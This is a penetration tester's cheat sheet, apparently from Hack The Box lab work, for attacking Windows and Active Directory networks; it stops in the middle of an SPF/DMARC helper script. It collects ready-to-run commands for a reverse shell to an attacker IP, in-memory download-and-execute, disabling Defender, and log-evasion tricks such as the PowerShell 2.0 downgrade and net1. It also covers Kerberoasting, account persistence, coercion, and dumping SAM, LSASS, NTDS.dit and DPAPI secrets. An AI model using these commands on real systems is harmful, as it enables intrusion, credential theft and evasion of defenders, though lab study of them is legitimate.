#Use Wireshark to capture ARP or mDNS traffic (GUI); -E keeps the environment so the GUI works under sudo
Intrusionz3r0X@htb[/htb]$ sudo -E wireshark
#Use tcpdump to capture traffic on the internal interface into a pcap file
Intrusionz3r0X@htb[/htb]$ sudo tcpdump -i ens224 -w capture.pcap
#Read capture.pcap, keep only ARP frames and pull out the unique IP addresses seen
Intrusionz3r0X@htb[/htb]$ tshark -r capture.pcap -Y "arp" | grep -oP "\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}" | sort -u
#Passively analyze LLMNR/NBT-NS/mDNS traffic with Responder (-A is analyze mode: it listens and logs but does not poison)
Intrusionz3r0X@htb[/htb]$ sudo responder -I ens224 -A
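The tshark | grep pipeline above only reports IP strings. The script below is an added example, not part of the original notes: it does the same extraction directly from the pcap format, keeping the sender MAC as well, and also lists which hosts send mDNS queries and what they ask for. The capture it analyzes is constructed in memory (the MACs, addresses and the _services._dns-sd._udp.local query are made up); for a real file pass open('capture.pcap', 'rb').read() to analyze(). It handles only the classic little-endian pcap that tcpdump writes by default, not pcapng.

```python
"""Extract ARP talkers and mDNS-querying hosts from a pcap in pure Python."""
import struct
from collections import defaultdict

ETH_ARP, ETH_IPV4 = 0x0806, 0x0800
MDNS_PORT, MDNS_GROUP = 5353, "224.0.0.251"
PCAP_MAGIC_LE = 0xA1B2C3D4   # classic pcap, little-endian, microsecond timestamps


def iter_frames(data: bytes):
    """Yield raw Ethernet frames from classic pcap bytes (pcapng is not handled)."""
    magic, _, _, _, _, _, linktype = struct.unpack("<IHHiIII", data[:24])
    if magic != PCAP_MAGIC_LE:
        raise ValueError("unsupported pcap magic: %#x" % magic)
    if linktype != 1:                                  # LINKTYPE_ETHERNET
        raise ValueError("expected Ethernet link type, got %d" % linktype)
    off = 24
    while off + 16 <= len(data):
        _, _, incl_len, _ = struct.unpack("<IIII", data[off:off + 16])
        off += 16
        yield data[off:off + incl_len]
        off += incl_len


def ip4(b: bytes) -> str:
    return ".".join(str(x) for x in b)


def mac(b: bytes) -> str:
    return ":".join("%02x" % x for x in b)


def dns_qname(msg: bytes) -> str:
    """Decode the first question name of a DNS/mDNS message (no name compression)."""
    off, labels = 12, []                               # skip the 12-byte DNS header
    while off < len(msg) and msg[off] != 0 and not msg[off] & 0xC0:
        n = msg[off]
        labels.append(msg[off + 1:off + 1 + n].decode("ascii", "replace"))
        off += 1 + n
    return ".".join(labels)


def analyze(pcap: bytes) -> dict:
    """Return {'arp': {sender_ip: sender_mac}, 'mdns': {src_ip: [question names]}}."""
    arp, mdns = {}, defaultdict(list)
    for frame in iter_frames(pcap):
        ethertype = struct.unpack("!H", frame[12:14])[0]
        body = frame[14:]
        if ethertype == ETH_ARP and len(body) >= 28:
            # Whoever sends an ARP packet is alive: sender MAC at 8..14, sender IP at 14..18
            arp[ip4(body[14:18])] = mac(body[8:14])
        elif ethertype == ETH_IPV4 and len(body) >= 28:
            ihl = (body[0] & 0x0F) * 4
            proto, src, dst = body[9], ip4(body[12:16]), ip4(body[16:20])
            udp = body[ihl:]
            if proto == 17 and dst == MDNS_GROUP and struct.unpack("!H", udp[2:4])[0] == MDNS_PORT:
                mdns[src].append(dns_qname(udp[8:]))  # UDP header is 8 bytes
    return {"arp": arp, "mdns": dict(mdns)}


# --- constructed sample capture (made-up hosts, not real traffic) ------------
def _eth(dst, src, ethertype, payload):
    return dst + src + struct.pack("!H", ethertype) + payload


def _arp_request(sha, spa, tpa):
    # htype=1 (Ethernet), ptype=IPv4, hlen=6, plen=4, oper=1 (request), target MAC unknown
    return struct.pack("!HHBBH", 1, 0x0800, 6, 4, 1) + sha + spa + b"\x00" * 6 + tpa


def _mdns_ptr_query(src_mac, src_ip, name):
    qname = b"".join(bytes([len(label)]) + label.encode() for label in name.split(".")) + b"\x00"
    dns = struct.pack("!HHHHHH", 0, 0, 1, 0, 0, 0) + qname + struct.pack("!HH", 12, 1)  # 1 question, PTR IN
    udp = struct.pack("!HHHH", MDNS_PORT, MDNS_PORT, 8 + len(dns), 0) + dns
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0, 0, 255, 17, 0,
                     src_ip, bytes([224, 0, 0, 251])) + udp
    return _eth(b"\x01\x00\x5e\x00\x00\xfb", src_mac, ETH_IPV4, ip)   # mDNS multicast MAC


def build_sample_pcap() -> bytes:
    mac_a = b"\x00\x11\x22\x33\x44\x55"
    mac_b = b"\xaa\xbb\xcc\xdd\xee\xff"
    mac_c = b"\x02\x42\xac\x10\x05\x82"
    frames = [
        _eth(b"\xff" * 6, mac_a, ETH_ARP, _arp_request(mac_a, bytes([172, 16, 5, 5]), bytes([172, 16, 5, 1]))),
        _eth(b"\xff" * 6, mac_b, ETH_ARP, _arp_request(mac_b, bytes([172, 16, 5, 25]), bytes([172, 16, 5, 5]))),
        _mdns_ptr_query(mac_c, bytes([172, 16, 5, 130]), "_services._dns-sd._udp.local"),
    ]
    out = struct.pack("<IHHiIII", PCAP_MAGIC_LE, 2, 4, 0, 0, 65535, 1)   # global header
    for f in frames:
        out += struct.pack("<IIII", 0, 0, len(f), len(f)) + f             # per-packet header
    return out


if __name__ == "__main__":
    for proto, hosts in analyze(build_sample_pcap()).items():
        print(proto, hosts)
```

ARP senders are recorded regardless of whether the packet is a request or a reply, because either way the sender address is a live host; mDNS is matched on the multicast group and port rather than on the source port, since responders do not always send from 5353.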
#List the contents of a shared folder
C:\htb> dir \\192.168.220.129\Finance\
PS C:\htb> Get-ChildItem \\192.168.220.129\Finance\
#Search for a specific word in file names (N: is the mapped share)
C:\htb> dir n:\*cred* /s /b
C:\htb> dir n:\*secret* /s /b
PS C:\htb> Get-ChildItem -Recurse -Path N:\ -Include *cred* -File
Intrusionz3r0X@htb[/htb]$ find /mnt/Finance/ -name '*cred*'
#Search for a specific word within the content of the files
C:\htb> findstr /s /i cred n:\*.*
PS C:\htb> Get-ChildItem -Recurse -Path N:\ -File | Select-String "cred" -List
Intrusionz3r0X@htb[/htb]$ grep -rni cred /mnt/Finance/
#Create an SMB share on Windows from the command line (needs local admin)
mkdir C:\temp
net share temp=C:\temp /grant:everyone,full
#PowerShell downgrade: if Windows PowerShell 2.0 is still installed, starting it with the -version 2 switch gives a session without script block logging, which only exists in PowerShell 5 and later, so the commands run there are not recorded in the PowerShell Operational log in Event Viewer. This is a good way to stay under the defenders' radar while still using tooling built into the host; note that the engine start itself is still logged (Windows PowerShell log, Event ID 400 with EngineVersion 2.0), which is how defenders detect the downgrade.
#Check the host firewall profiles and whether the Defender service (WinDefend) is running
PS C:\htb> netsh advfirewall show allprofiles
C:\htb> sc query windefend
#Check the status of Windows Defender (look at RealTimeProtectionEnabled=True/False and AMRunningMode)
PS C:\htb> Get-MpComputerStatus
#Disable real-time monitoring in Windows Defender (requires local admin, is refused when Tamper Protection is on, and the change itself is logged)
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true
#Enumerate AppLocker policies (the effective policy merges local and GPO rules)
PS C:\htb> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
#Check the PowerShell language mode: ConstrainedLanguage blocks most offensive tooling, FullLanguage does not
PS C:\htb> $ExecutionContext.SessionState.LanguageMode
#The execution policy is not a security boundary: change it, or bypass it for a single invocation
PS C:\htb> Set-ExecutionPolicy unrestricted
PS C:\htb> powershell.exe -noprofile -executionpolicy bypass -file .\script.ps1
#Enumerate and read LAPS passwords (LAPSToolkit): which groups are delegated to read them, which principals hold the extended right, and which computers have LAPS
PS C:\htb> Find-LAPSDelegatedGroups
PS C:\htb> Find-AdmPwdExtendedRights
PS C:\htb> Get-LAPSComputers
#Download RunasCs and use it to run cmd as another local user, sending a reverse shell back to the attacker
C:\ProgramData>powershell -c wget 10.10.14.6/RunasCs.exe -outfile RunasCs.exe
C:\ProgramData>.\RunasCs.exe <username> <password> -r 10.10.14.6:443 cmd
#Listener on the attacker side (rlwrap gives line editing and history in the raw shell)
Intrusionz3r@hacky$ rlwrap -cAr nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.187 49906
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
#Print the adapter settings for the host; the network segment(s) can be worked out from here
ipconfig /all
#Display the routing table (IPv4 and IPv6), identifying known networks and layer 3 routes shared with the host
route print
#Display the status of the host's firewall, i.e. whether it is active and filtering traffic
netsh advfirewall show state
Windows Management Instrumentation (WMI)
#Note: wmic.exe is deprecated and may be absent on recent Windows builds; Get-CimInstance reaches the same classes
#Print the patch level and description of the hotfixes applied
wmic qfe get Caption,Description,HotFixID,InstalledOn
#Display basic host information including the listed attributes
wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List
#List all processes on the host
wmic process list /format:list
#Display information about the domain and domain controllers
wmic ntdomain list /format:list
#Display all local accounts and any domain accounts that have logged into the device
wmic useraccount list /format:list
#Information about all local groups
wmic group list /format:list
#Dump information about any system accounts that are being used as service accounts
wmic sysaccount list /format:list
Net Commands
Net commands trick: if you believe the network defenders are actively logging or alerting on commands out of the ordinary, type net1 instead of net. net1.exe is a legitimate Windows binary that performs the same functions, without the potential trigger on the "net" string.
#Information about password requirements
net accounts
#Password and lockout policy for the domain
net accounts /domain
#Information about domain groups
net group /domain
#List users with Domain Admin privileges
net group "Domain Admins" /domain
#List of computer accounts joined to the domain
net group "domain computers" /domain
#List the computer accounts of the domain controllers
net group "Domain Controllers" /domain
#Users that belong to a given domain group
net group <domain_group_name> /domain
#List of domain groups
net groups /domain
#All local groups on the host
net localgroup
#Members of the domain's built-in Administrators group (Domain Admins is a member by default)
net localgroup administrators /domain
#Members of the local Administrators group
net localgroup Administrators
#Add a user to the local Administrators group (requires admin rights and is a change defenders commonly alert on)
net localgroup administrators [username] /add
#Check the current shares
net share
#Information about a user within the domain
net user <ACCOUNT_NAME> /domain
#List all users of the domain
net user /domain
#Information about the current user
net user %username%
#Mount a share locally as drive X:
net use x: \\computer\share
#List the computers visible in the current domain or workgroup
net view
#List the computers in the given domain (all domains on the network if no name is given)
net view /all /domain[:domainname]
#List the shares of a computer, including hidden ($) shares
net view \\computer /ALL
#List the domains visible on the network (add :domainname to list that domain's computers)
net view /domain
PowerShell Cmdlets
#Discover loaded modules
PS C:\htb> Get-Module
#Load the AD module (RSAT)
PS C:\htb> Import-Module ActiveDirectory
#Get domain info
PS C:\htb> Get-ADDomain
#Check for trust relationships
PS C:\htb> Get-ADTrust -Filter *
#Get-ADUser listing of accounts with an SPN set, i.e. candidates for a Kerberoasting attack
PS C:\htb> Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
#Group enumeration, and detailed information on one group
PS C:\htb> Get-ADGroup -Filter * | select name
PS C:\htb> Get-ADGroup -Identity "Backup Operators"
#List the group members
PS C:\htb> Get-ADGroupMember -Identity "Backup Operators"
#Test for local admin access on a host with the current user (PowerView)
PS C:\htb> Test-AdminAccess -ComputerName ACADEMY-EA-MS01
#Enumerate domain trust relationships with PowerView
PS C:\htb> Get-DomainTrust
#Perform a domain trust mapping (follows the trusts recursively)
PS C:\htb> Get-DomainTrustMapping
#Check users in the child domain using Get-DomainUser
PS C:\htb> Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL | select SamAccountName
#Enumerate groups with members that do not belong to the domain, also known as foreign group membership
PS C:\htb> Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL
#Query trust relationships with netdom
C:\htb> netdom query /domain:inlanefreight.local trust
#Query domain controllers
C:\htb> netdom query /domain:inlanefreight.local dc
#Query workstations and servers
C:\htb> netdom query /domain:inlanefreight.local workstation
Harnessing PowerShell
#List the modules loaded and available for use
Get-Module
#Show the execution policy at each scope
Get-ExecutionPolicy -List
#Change the policy for the current process only (-Scope Process); it reverts once the process ends, so no permanent change is made to the victim host
Set-ExecutionPolicy Bypass -Scope Process
#Read the specified user's PowerShell (PSReadLine) command history; it may contain passwords or point to config files or scripts that contain them
Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
#Return the environment variables (key paths, user, computer name, etc.)
Get-ChildItem Env: | ft Key,Value
#Quick way to download a script with PowerShell and run it from memory; nothing touches disk, but the command line is visible to script block logging
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"
Miscellaneous
#Convert a UTF-16LE file (the default for redirected Windows output) to UTF-8 so Linux tools can read it
iconv -f UTF-16LE -t UTF-8 Applockerpolicy.txt -o Applockerpolicy2.txt
#Run the BloodHound collector on Linux; -ns points DNS at a DC, -c all runs every collection method
Intrusionz3r0X@htb[/htb]$ sudo bloodhound-python -u 'forend' -p 'Klmcargo2' -ns 172.16.5.5 -d inlanefreight.local -c all
#Zip the JSON output for upload into the BloodHound GUI, then start neo4j and BloodHound
Intrusionz3r0X@htb[/htb]$ zip -r ilfreight_bh.zip *.json
Intrusionz3r0X@htb[/htb]$ sudo neo4j start
Intrusionz3r0X@htb[/htb]$ bloodhound
#Run the collector against a specific domain and DC (neo4j console keeps the database in the foreground instead of as a service)
Intrusionz3r0X@htb[/htb]$ bloodhound-python -d INLANEFREIGHT.LOCAL -dc ACADEMY-EA-DC01 -c All -u forend -p Klmcargo2
Intrusionz3r0X@htb[/htb]$ sudo neo4j console
#Run the collector on Windows (SharpHound), then type bloodhound into a CMD or PowerShell console to open the GUI
PS C:\htb> .\SharpHound.exe -c All --zipfilename ILFREIGHT
Adding INLANEFREIGHT.LOCAL DNS information to /etc/resolv.conf (search domain plus the DC as nameserver; resolvconf and systemd-resolved overwrite this file, so reapply it after a change or set it through the resolver manager instead)
Intrusionz3r0X@htb[/htb]$ cat /etc/resolv.conf
# Dynamic resolv.conf(5) file for glibc resolver(3) generated by resolvconf(8)
# DO NOT EDIT THIS FILE BY HAND -- YOUR CHANGES WILL BE OVERWRITTEN
# 127.0.0.53 is the systemd-resolved stub resolver.
# run "resolvectl status" to see details about the actual nameservers.
#nameserver 1.1.1.1
#nameserver 8.8.8.8
domain INLANEFREIGHT.LOCAL
nameserver 172.16.5.5
PowerView
Users
#Get info about a user
PS C:\htb> Get-NetUser -UserName student107
#List all users with the fields most useful for password guessing (description, last set, logon and bad password counts)
PS C:\htb> Get-NetUser | select samaccountname, description, pwdlastset, logoncount, badpwdcount
#All disabled users
Get-NetUser -UACFilter ACCOUNTDISABLE
#Kerberoastable users that are members of Domain Admins
Get-NetUser -SPN | ?{$_.memberof -match 'Domain Admins'}
Groups
PS C:\htb> Get-NetGroup #Get groups
PS C:\htb> Get-NetGroup -Domain mydomain.local #Get the groups of a specific domain
PS C:\htb> Get-NetGroup 'Domain Admins' #Get all data of a group
PS C:\htb> Get-NetGroup -UserName "myusername" #Get the groups of a user
Get-NetGroupMember -Identity "Administrators" -Recurse #Get the users inside the "Administrators" group; with -Recurse, nested groups are expanded and their members are printed too
Get-NetGroupMember -Identity "Enterprise Admins" -Domain mydomain.local #Remember that "Enterprise Admins" only exists in the forest root domain
Get-NetLocalGroup -ComputerName dc.mydomain.local -ListGroups #Get the local groups of a machine (needs admin rights on non-DC hosts)
#Recursive group membership, to know who to target for potential privilege escalation
PS C:\htb> Get-DomainGroupMember -Identity "Domain Admins" -Recurse
Computers
Get-DomainComputer -Properties DnsHostName #Get the DNS names of all computers
Get-NetComputer #Get all computer objects
Get-NetComputer -TrustedToAuth #Find computers with constrained delegation
Logon and Session
Get-NetSession -ComputerName <servername> #Get active sessions on the host
Get-NetRDPSession -ComputerName <servername> #List RDP sessions on a host (needs admin rights on the host)
Retrieve the domain SID
(Get-ADDomain).DomainSID
Powerful PowerView commands
#AS-REP roastable users (Kerberos pre-authentication not required)
PS C:\htb> Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl
#Kerberoastable users (an SPN is set)
PS C:\htb> Get-NetUser -SPN | select samaccountname,userprincipalname,useraccountcontrol | fl
#Request a TGS ticket for every SPN user and export them in hashcat format
PS C:\DotNetNuke\Portals\0> Get-DomainUser * -SPN -verbose | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_spns.csv -NoTypeInformation
#Users with PASSWD_NOTREQD set in userAccountControl are not subject to the domain password policy
#Such users might have empty passwords (if allowed) or shorter passwords
Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol
#Persistence (requires write access to the target user object; both changes are visible in the object's userAccountControl and servicePrincipalName attributes)
#Make a user AS-REP roastable: -XOR toggles the DONT_REQ_PREAUTH bit (4194304 = 0x400000), so running it on an account that already has the flag clears it; Set-ADAccountControl sets it explicitly
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
Get-ADUser Jorden | Set-ADAccountControl -doesnotrequirepreauth $true
#Make a user Kerberoastable by adding an SPN to it
Set-DomainObject -Identity <username> -Set @{serviceprincipalname='just/whateverUn1Que'} -verbose
#Cleanup: require pre-authentication again
Get-ADUser -Filter 'Name -like "Jorden"' | Set-ADAccountControl -doesnotrequirepreauth $false
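The userAccountControl values that the queries above filter on are a bitmask, which is why the -XOR form of Set-DomainObject toggles DONT_REQ_PREAUTH rather than setting it. The script below is an added example, not code from the original notes: it decodes the mask with the documented flag values, reproduces the -PreauthNotRequired, -SPN and PASSWD_NOTREQD selections over a few constructed user records (the account names and the SPN are made up), and contrasts the XOR toggle with the explicit set/clear that Set-ADAccountControl performs.

```python
"""Decode userAccountControl and triage the roasting-related flags."""

# Documented userAccountControl bit values.
UAC_FLAGS = {
    "SCRIPT": 0x0001,
    "ACCOUNTDISABLE": 0x0002,
    "HOMEDIR_REQUIRED": 0x0008,
    "LOCKOUT": 0x0010,
    "PASSWD_NOTREQD": 0x0020,
    "PASSWD_CANT_CHANGE": 0x0040,
    "ENCRYPTED_TEXT_PWD_ALLOWED": 0x0080,
    "TEMP_DUPLICATE_ACCOUNT": 0x0100,
    "NORMAL_ACCOUNT": 0x0200,
    "INTERDOMAIN_TRUST_ACCOUNT": 0x0800,
    "WORKSTATION_TRUST_ACCOUNT": 0x1000,
    "SERVER_TRUST_ACCOUNT": 0x2000,
    "DONT_EXPIRE_PASSWORD": 0x10000,
    "MNS_LOGON_ACCOUNT": 0x20000,
    "SMARTCARD_REQUIRED": 0x40000,
    "TRUSTED_FOR_DELEGATION": 0x80000,
    "NOT_DELEGATED": 0x100000,
    "USE_DES_KEY_ONLY": 0x200000,
    "DONT_REQ_PREAUTH": 0x400000,          # 4194304, the value used with -XOR above
    "PASSWORD_EXPIRED": 0x800000,
    "TRUSTED_TO_AUTH_FOR_DELEGATION": 0x1000000,
    "PARTIAL_SECRETS_ACCOUNT": 0x4000000,
}


def decode_uac(value: int) -> list:
    """Names of the flags set in a userAccountControl integer, in bit order."""
    return [name for name, bit in sorted(UAC_FLAGS.items(), key=lambda kv: kv[1]) if value & bit]


def xor_flag(value: int, flag: str) -> int:
    """What Set-DomainObject -XOR @{useraccountcontrol=<bit>} does: toggle, not set."""
    return value ^ UAC_FLAGS[flag]


def set_flag(value: int, flag: str, enabled: bool) -> int:
    """What Set-ADAccountControl -DoesNotRequirePreAuth $true/$false does: set or clear."""
    bit = UAC_FLAGS[flag]
    return value | bit if enabled else value & ~bit


def classify(user: dict) -> dict:
    """Apply the PowerView selections above to one user record.

    user = {"samaccountname": str, "useraccountcontrol": int,
            "serviceprincipalname": list of str}
    """
    uac = user["useraccountcontrol"]
    disabled = bool(uac & UAC_FLAGS["ACCOUNTDISABLE"])
    return {
        "sam": user["samaccountname"],
        "disabled": disabled,
        # Get-DomainUser -PreauthNotRequired; the KDC refuses disabled accounts, so no AS-REP to crack
        "asrep_roastable": bool(uac & UAC_FLAGS["DONT_REQ_PREAUTH"]) and not disabled,
        # Get-NetUser -SPN; likewise no service ticket is issued for a disabled account
        "kerberoastable": bool(user.get("serviceprincipalname")) and not disabled,
        # Get-DomainUser -UACFilter PASSWD_NOTREQD
        "passwd_notreqd": bool(uac & UAC_FLAGS["PASSWD_NOTREQD"]),
    }


# Constructed sample users (NORMAL_ACCOUNT plus the flags named in the comments).
SAMPLE_USERS = [
    {"samaccountname": "svc_sql", "useraccountcontrol": 0x200,
     "serviceprincipalname": ["MSSQLSvc/sql01.inlanefreight.local:1433"]},   # SPN set
    {"samaccountname": "jorden", "useraccountcontrol": 0x200 | 0x400000,
     "serviceprincipalname": []},                                             # DONT_REQ_PREAUTH
    {"samaccountname": "old_admin", "useraccountcontrol": 0x200 | 0x2 | 0x400000,
     "serviceprincipalname": []},                                             # disabled + pre-auth off
    {"samaccountname": "kiosk", "useraccountcontrol": 0x200 | 0x20,
     "serviceprincipalname": []},                                             # PASSWD_NOTREQD
]


def roastable_report(users=SAMPLE_USERS) -> dict:
    """Map category -> sorted sAMAccountNames, the way a tester triages the output."""
    rows = [classify(u) for u in users]
    return {
        "asrep": sorted(r["sam"] for r in rows if r["asrep_roastable"]),
        "kerberoast": sorted(r["sam"] for r in rows if r["kerberoastable"]),
        "passwd_notreqd": sorted(r["sam"] for r in rows if r["passwd_notreqd"]),
    }


if __name__ == "__main__":
    print(roastable_report())
    # -XOR applied twice (or once to an account that already has the bit) clears it again
    print(decode_uac(xor_flag(xor_flag(0x200, "DONT_REQ_PREAUTH"), "DONT_REQ_PREAUTH")))
```

When planting the persistence flag, read useraccountcontrol first and use the explicit set form, so a re-run of the same command cannot silently undo it.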
#Find passwords in the description field using Get-DomainUser
Get-DomainUser * | Select-Object samaccountname, userprincipalname, useraccountcontrol, description | Where-Object {$_.Description} | fl
#Retrieve *most* principals who can perform DC replication for inlanefreight.local (i.e. DCSync): ACEs granting a DS-Replication-Get-Changes right, or GenericAll on the domain head. A principal needs both Get-Changes and Get-Changes-All, and WriteDacl/WriteOwner holders (who can grant themselves the rights) are not shown
Get-ObjectAcl "DC=inlanefreight,DC=local" -ResolveGUIDs | ? { ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') }
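The one-liner above matches any ACE that mentions a replication right, which is why it is labelled "most": DCSync needs both DS-Replication-Get-Changes and DS-Replication-Get-Changes-All (or a right that implies them), and a principal with WriteDacl or WriteOwner on the domain head can simply grant itself those rights. The following is an added example, not part of the original notes or of PowerView: it evaluates a constructed ACE list shaped like Get-ObjectAcl output (made-up SIDs, the real control-access GUIDs for the two replication rights) and separates the full, partial and grant-yourself cases.

```python
"""Decide which principals can DCSync from a list of ACEs on the domain head."""

DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPL_RIGHTS = {DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL}
ALL_OBJECT_TYPES = "00000000-0000-0000-0000-000000000000"   # ObjectType when no GUID is set


def dcsync_capable(aces) -> dict:
    """Classify principals by what the allow ACEs let them do.

    Each ACE: {"SecurityIdentifier", "ActiveDirectoryRights" (comma-separated, as
    PowerView prints it), "ObjectType" (GUID string), optional "AceType"}.
    Returns {"full": set(sid), "partial": {sid: set(missing guids)}, "can_grant": set(sid)}.
    """
    held = {}          # sid -> replication GUIDs explicitly granted
    generic = set()    # sids with GenericAll or an unrestricted ExtendedRight
    can_grant = set()
    for ace in aces:
        if ace.get("AceType", "AccessAllowed") != "AccessAllowed":
            continue   # deny ACEs grant nothing (a full evaluator would also subtract them)
        sid = ace["SecurityIdentifier"]
        rights = {r.strip() for r in ace["ActiveDirectoryRights"].split(",")}
        obj = ace.get("ObjectType", ALL_OBJECT_TYPES).lower()
        if "GenericAll" in rights:
            generic.add(sid)
        if "ExtendedRight" in rights:
            if obj == ALL_OBJECT_TYPES:      # ExtendedRight without a GUID = every extended right
                generic.add(sid)
            elif obj in REPL_RIGHTS:
                held.setdefault(sid, set()).add(obj)
        if rights & {"WriteDacl", "WriteOwner"}:
            can_grant.add(sid)
    full = set(generic)
    partial = {}
    for sid, guids in held.items():
        if guids == REPL_RIGHTS:
            full.add(sid)
        elif sid not in full:
            partial[sid] = REPL_RIGHTS - guids
    return {"full": full, "partial": partial, "can_grant": can_grant - full}


# Constructed ACEs resembling Get-ObjectAcl -ResolveGUIDs output (made-up SIDs).
SAMPLE_ACES = [
    {"SecurityIdentifier": "S-1-5-21-1-2-3-512", "ActiveDirectoryRights": "GenericAll",
     "ObjectType": ALL_OBJECT_TYPES},                                          # Domain Admins
    {"SecurityIdentifier": "S-1-5-21-1-2-3-1105", "ActiveDirectoryRights": "ExtendedRight",
     "ObjectType": DS_REPL_GET_CHANGES},                                       # backup account, right 1
    {"SecurityIdentifier": "S-1-5-21-1-2-3-1105", "ActiveDirectoryRights": "ExtendedRight",
     "ObjectType": DS_REPL_GET_CHANGES_ALL},                                   # backup account, right 2
    {"SecurityIdentifier": "S-1-5-21-1-2-3-1201", "ActiveDirectoryRights": "ExtendedRight",
     "ObjectType": DS_REPL_GET_CHANGES},                                       # only one of the two
    {"SecurityIdentifier": "S-1-5-21-1-2-3-1337", "ActiveDirectoryRights": "WriteDacl, ReadProperty",
     "ObjectType": ALL_OBJECT_TYPES},                                          # can grant itself DCSync
    {"SecurityIdentifier": "S-1-5-21-1-2-3-1400", "ActiveDirectoryRights": "ExtendedRight",
     "ObjectType": DS_REPL_GET_CHANGES_ALL, "AceType": "AccessDenied"},        # deny ACE, ignored
]

if __name__ == "__main__":
    for category, principals in dcsync_capable(SAMPLE_ACES).items():
        print(category, principals)
```

Resolve the SIDs in "full" and "can_grant" to names afterwards; in a real domain the list should contain little more than Domain Controllers, Enterprise Domain Controllers, Domain Admins, Enterprise Admins and Administrators, so anything else is a finding.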
Netexec
When you start an internal pentest, the coercion checks are among the first modules to try. The coerce_plus module tests the known RPC coercion methods (PetitPotam, PrinterBug, DFSCoerce, ShadowCoerce, MSEven); if the host is vulnerable, set LISTENER to your own IP to make it authenticate to you.
#By default LISTENER is set to localhost, so nothing is coerced onto the network. This check uses a null session; retry with real credentials if it fails
Intrusionz3r0X@htb[/htb]$ nxc smb <ip> -u '' -p '' -M coerce_plus -o LISTENER=<AttackerIP>
To run all exploit methods at once, add the ALWAYS=true option; otherwise the module stops as soon as the underlying RPC call reports a successful coercion.
#Dump the SAM (local admin privilege on the target)
Intrusionz3r0X@htb[/htb]$ nxc smb 192.168.1.0/24 -u UserName -p 'PASSWORDHERE' --sam
#Dump LSA secrets (local admin privilege)
Intrusionz3r0X@htb[/htb]$ nxc smb 192.168.1.0/24 -u UserName -p 'PASSWORDHERE' --lsa
#Dump LSASS (local admin privilege; both modules read LSASS memory, which EDR commonly alerts on)
Intrusionz3r0X@htb[/htb]$ nxc smb 192.168.255.131 -u administrator -p pass -M lsassy
Intrusionz3r0X@htb[/htb]$ nxc smb 192.168.255.131 -u administrator -p pass -M nanodump
#DPAPI: collect secrets from Credential Manager, Chrome, Edge and Firefox; 'cookies' also dumps browser cookies, 'nosystem' skips the SYSTEM-context blobs, --local-auth uses a local account
Intrusionz3r0X@htb[/htb]$ nxc smb <ip> -u user -p password --dpapi
Intrusionz3r0X@htb[/htb]$ nxc smb <ip> -u user -p password --dpapi cookies
Intrusionz3r0X@htb[/htb]$ nxc smb <ip> -u user -p password --dpapi nosystem
Intrusionz3r0X@htb[/htb]$ nxc smb <ip> -u user -p password --local-auth --dpapi nosystem
#Dump NTDS.dit from the target DC (admin on the DC); --users shows only user accounts, --enabled only enabled ones, vss uses a volume shadow copy, the ntdsutil module uses the built-in tool
Intrusionz3r0X@htb[/htb]$ nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' --ntds
Intrusionz3r0X@htb[/htb]$ nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' --ntds --users
Intrusionz3r0X@htb[/htb]$ nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' --ntds --users --enabled
Intrusionz3r0X@htb[/htb]$ nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' --ntds vss
Intrusionz3r0X@htb[/htb]$ nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' -M ntdsutil
#Dump saved Wi-Fi passwords
Intrusionz3r0X@htb[/htb]$ nxc smb <ip> -u user -p pass -M wifi
Check email security
Spoofy is a program that checks whether a list of domains can be spoofed, based on their SPF and DMARC records. You may be asking, "Why do we need another tool that can check if a domain can be spoofed?"
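As an added example, not part of the original notes and not Spoofy's own logic, here is a simplified version of the SPF/DMARC reasoning such a tool performs: parse the 'all' qualifier of the SPF record and the policy, subdomain policy and pct tag of the DMARC record, then classify the domain. The records are constructed strings for made-up domains; for real targets feed it the TXT records of the domain itself and of _dmarc.<domain>.

```python
"""Classify a domain's spoofability from its SPF and DMARC TXT records."""
import re


def parse_spf(record):
    """Return the qualifier of the SPF 'all' mechanism ('+', '-', '~', '?') or None if no SPF."""
    if not record or not record.lower().startswith("v=spf1"):
        return None
    for term in record.split()[1:]:
        m = re.fullmatch(r"([+\-~?]?)all", term, re.IGNORECASE)
        if m:
            return m.group(1) or "+"   # a bare 'all' means pass, i.e. +all
    return "?"                         # no 'all' term at all: implicit neutral


def parse_dmarc(record):
    """Return {'p': policy, 'sp': subdomain policy, 'pct': int} or None if there is no DMARC."""
    if not record or not record.lower().startswith("v=dmarc1"):
        return None
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            k, v = part.split("=", 1)
            tags[k.strip().lower()] = v.strip().lower()
    p = tags.get("p", "none")
    return {"p": p, "sp": tags.get("sp", p), "pct": int(tags.get("pct", "100"))}


def spoofability(spf_record, dmarc_record):
    """Return (verdict, reason); verdict is 'spoofable', 'partial' or 'protected'.

    Simplified rules (assumption, not Spoofy's exact table): DMARC is what makes
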